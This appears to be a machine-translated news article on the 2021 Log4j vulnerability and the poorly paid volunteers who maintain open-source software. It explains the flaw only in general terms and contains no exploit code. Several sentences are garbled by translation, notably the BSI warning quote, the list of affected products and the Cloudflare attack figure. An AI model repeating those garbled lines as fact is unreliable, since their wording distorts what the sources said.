The past weekend was a nightmare for software developers all over the world: After a security gap was enormous, "who themselves can take advantage of six -year -olds," the Federal Office of Safety in Information Technology (BSI) called out the highest warning level. Accordingly, numerous programs that are used in various areas are affected by Minecraft, Cisco systems, Apple iCloud, Amazon Web Services and so on. Now the world arises: How could it come about?
In fact, Apache's Log4j program, which is causing the problems, seems pretty harmless at first glance. It is a so-called logger, which only logs which activities take place on a software. Loggers are needed partly for legal reasons, to prove how a particular application was used, but also to detect possible errors. Now, however, it has turned out that Log4j has a serious security vulnerability. It makes it possible for an attacker to insert program code unnoticed on a computer on which the logger is running and to execute it there. For example, you can steal data or mine cryptocurrencies with third-party computing power.
The extent of the security threat is so great because Log4j is enormously widespread and is used in a wide variety of applications. Because it is an open source software (OSS for short), which means that the source code is freely accessible and can be used by everyone free of charge. In fact, a large part of the IT infrastructure used is now based on OSS, which generally proves to be much more secure than commercial variants. For example, while the source code of the freely available operating system Linux has an average of 0.17 errors per 1000 lines of code, for commercial systems there are between 20 and 30, as "Wired" reported back in 2004. This is not surprising: if a program code is publicly available, many people can check it, which makes it possible to eliminate more errors.
An ungrateful work
So what went wrong with Log4j? This question has been circulating on the Internet since last weekend. An xkcd comic quickly made the rounds, which summarizes the problem in one picture: It shows a complicated, wobbly system consisting of numerous individual parts. This represents »our entire modern digital infrastructure«. But the structure is based on a tiny component, "a project that some person in Nebraska has been waiting for since 2003 without thanks." This is more or less the story of Log4j and that of many other open source projects that developers maintain in their spare time.
While employed computer scientists often obtain six-digit annual salaries in companies, people who work on open source projects are financed by donations. In fact, Ralph Goers, who managed Log4j in his free time (in addition to his full-time job), had recently only three sponsors on the software platform »Github«. Volkan Yazıcı, who works on Log4J, also complains on Twitter: "We have worked continuously on measures ... But nothing holds out to insult us because of a work for which we are not even paid for ..."
Unfortunately, the problem is not new. As early as 2014, the so-called Heartbleed vulnerability drew attention to the need to rethink how we deal with open source software – and to reward its developers financially. In addition, it is frightening that many companies apparently use these programs without first examining them in detail.
The end of open source?
Despite the catastrophic extent of the Log4J security gap, experts see no failure of open source software. In this case, the free availability of the source brings disadvantages in this case, for example, a tweet from the CEO of the internet security service »Cloudflare« took place at times more than 400 attacks per second to the Log4J weak point. In the meantime, however, there is a revised version of the program in which the loophole is no longer available.
In fact, freely available source code offers many advantages that go far beyond financial aspects. In addition to greater security, the programs are much more flexible and diverse due to free access: developers can, for example, work out extensions from which others also benefit. As a result, for example, the software is not bound to the fixed structures specified by a particular company, but can enable numerous applications that may not have been envisaged at first. In addition, OSS is increasingly focusing on making the programs compatible with as many systems as possible.
These are just a few of the many reasons why the use of OSS will probably not go back in the future. However, computer scientists hope that their work will be recognized more in the future - also financially.
